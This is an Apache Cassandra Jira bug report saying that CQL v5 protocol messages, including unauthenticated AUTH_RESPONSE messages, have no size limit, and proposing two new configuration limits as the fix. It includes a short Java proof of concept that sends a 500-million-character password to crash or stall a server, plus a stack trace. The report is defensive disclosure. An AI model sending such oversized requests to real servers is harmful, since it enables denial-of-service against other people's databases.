Dmitry Konstantinov created CASSANDRA-20052:
-----------------------------------------------

             Summary: Size of CQL messages is not limited in V5 protocol logic
                 Key: CASSANDRA-20052
                 URL: https://issues.apache.org/jira/browse/CASSANDRA-20052
             Project: Cassandra
          Issue Type: Bug
          Components: Messaging/Client
            Reporter: Dmitry Konstantinov


Size of CQL messages is not limited in V5 protocol logic
 - After introducing of v5 frames we do not have any CQL message limit anymore, 
native_transport_max_frame_size_in_mb which had such limit in pre-V5 epoch is 
applicable now only to pre-V5 protocol sessions, otherwise it is applied only 
to the initial STARTUP/OPTIONS messages handling, it is not checked in any v5 
logic. So, currently a v5 CQL message of any size can be sent to Cassandra 
server.
 - The overload logic just allows to process huge messages for free to avoid 
starvation, so it does not provide any protection against the most dangerous 
requests from a memory pressure point of view.
 - The situation even more dangerous: the v5 framing logic is enabled just 
after AUTH response, so we do not limit message size even for AUTH_RESPONSE 
messages from a client. It can be used as a DoS attack: a non-authenticated 
client can send a huge username/password to Cassandra server to cause troubles 
with GC or even kill it.
An easy example:
{code:java}
public class TestBigAuthRequest {
    public static void main(String[] args) {
        String password = getString(500_000_000, '-');
        try (CqlSession session = CqlSession.builder()
                .addContactEndPoint(new DefaultEndPoint(new 
InetSocketAddress("localhost", 9042)))
                .withAuthCredentials("cassandra", password)
                .withLocalDatacenter("datacenter1")
                .build()) {
            session.execute("select * from system.local");
        }
    }

    private static String getString(int length, char charToFill) {
        if (length > 0) {
            char[] array = new char[length];
            Arrays.fill(array, charToFill);
            return new String(array);
        }
        return "";
    }
}
{code}

A thread stack of such invocation (captured to show the execution flow):
{code:java}
"nioEventLoopGroup-5-21@9164" prio=10 tid=0x86 nid=NA runnable
  java.lang.Thread.State: RUNNABLE
          at 
org.apache.cassandra.transport.messages.AuthResponse$1.decode(AuthResponse.java:45)
          at 
org.apache.cassandra.transport.messages.AuthResponse$1.decode(AuthResponse.java:39)
          at 
org.apache.cassandra.transport.Message$Decoder.decodeMessage(Message.java:432)
          at 
org.apache.cassandra.transport.Message$Decoder$RequestDecoder.decode(Message.java:467)
          at 
org.apache.cassandra.transport.Message$Decoder$RequestDecoder.decode(Message.java:459)
          at 
org.apache.cassandra.transport.CQLMessageHandler.processRequest(CQLMessageHandler.java:377)
          at 
org.apache.cassandra.transport.CQLMessageHandler$LargeMessage.onComplete(CQLMessageHandler.java:755)
          at 
org.apache.cassandra.net.AbstractMessageHandler$LargeMessage.supply(AbstractMessageHandler.java:561)
          at 
org.apache.cassandra.net.AbstractMessageHandler.processSubsequentFrameOfLargeMessage(AbstractMessageHandler.java:257)
          at 
org.apache.cassandra.net.AbstractMessageHandler.processIntactFrame(AbstractMessageHandler.java:229)
          at 
org.apache.cassandra.net.AbstractMessageHandler.process(AbstractMessageHandler.java:216)
          at 
org.apache.cassandra.transport.CQLMessageHandler.process(CQLMessageHandler.java:147)
          at 
org.apache.cassandra.net.FrameDecoder.deliver(FrameDecoder.java:330)
          at 
org.apache.cassandra.net.FrameDecoder.channelRead(FrameDecoder.java:294)
          at 
org.apache.cassandra.net.FrameDecoder.channelRead(FrameDecoder.java:277)
          at 
io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:379)
          at 
io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:365)
          at 
io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:357)
          at 
io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)
          at 
io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:379)
          at 
io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:365)
          at 
io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)
          at 
io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)
          at 
io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:719)
          at 
io.netty.channel.nio.NioEventLoop.processSelectedKeysOptimized(NioEventLoop.java:655)
          at 
io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:581)
          at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:493)
          at 
io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:989)
          at 
io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)
          at 
io.netty.util.concurrent.FastThreadLocalRunnable.run(FastThreadLocalRunnable.java:30)
          at java.lang.Thread.run(Thread.java:829)
{code}
The provided MR contains a fix for the issue which introduces 2 new parameters:
native_transport_max_message_size - to limit any CQL message size
native_transport_max_auth_message_size (default = 128KiB) - to limit auth 
response message size

Design questions:
 * The current implementation closes a CQL connection if a message is bigger 
than the limits. A skip message body logic can be implemented to continue the 
connection usage but it is more complicated and error prone.
 * The tricky question is the default value for 
native_transport_max_message_size, 
from one side - we want to have it not more than 
min(native_transport_max_request_data_in_flight_per_ip, 
native_transport_max_request_data_in_flight) to reduce chances to invoke the 
branch of logic when a error handling does not work
from another size - (native_transport_max_request_data_in_flight_per_ip, 
native_transport_max_request_data_in_flight) can be too small and break a 
backward compatibility for existing deployments where people uses large 
messages and small heaps (while it is not a good idea).

Related observations:
1) https://issues.apache.org/jira/browse/CASSANDRA-16886 - Reduce 
native_transport_max_frame_size_in_mb (from 256M to 16M)

2) A correspondent logic for Cassandra server internode protocol a message 
limit exists and rate limiting parameters are validated to be smaller than a 
single message max size:
internode_max_message_size = 
min(internode_application_receive_queue_reserve_endpoint_capacity, 
internode_application_send_queue_reserve_endpoint_capacity)

internode_application_receive_queue_reserve_endpoint_capacity = 128MiB
internode_application_send_queue_reserve_endpoint_capacity = 128MiB

internode_max_message_size <= 
internode_application_receive_queue_reserve_endpoint_capacity
internode_max_message_size <= 
internode_application_receive_queue_reserve_global_capacity
internode_max_message_size <= 
internode_application_send_queue_reserve_endpoint_capacity
internode_max_message_size <= 
internode_application_send_queue_reserve_global_capacity

3) Request types according to CQL specification:
4.1.1. STARTUP, in normal cases should be small
4.1.2. AUTH_RESPONSE, in normal cases should be small
4.1.3. OPTIONS, in normal cases should be small
4.1.4. QUERY, in normal cases should be small
4.1.5. PREPARE, in normal cases should be small
4.1.6. EXECUTE <-- potentially large in case of inserts, max_mutation_size = 
commitlog_segment_size / 2; where commitlog_segment_size_in_mb = 32MiB
4.1.7. BATCH <-- potentially large, max_mutation_size = commitlog_segment_size 
/ 2; where commitlog_segment_size_in_mb = 32MiB
4.1.8. REGISTER, in normal cases should be small



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to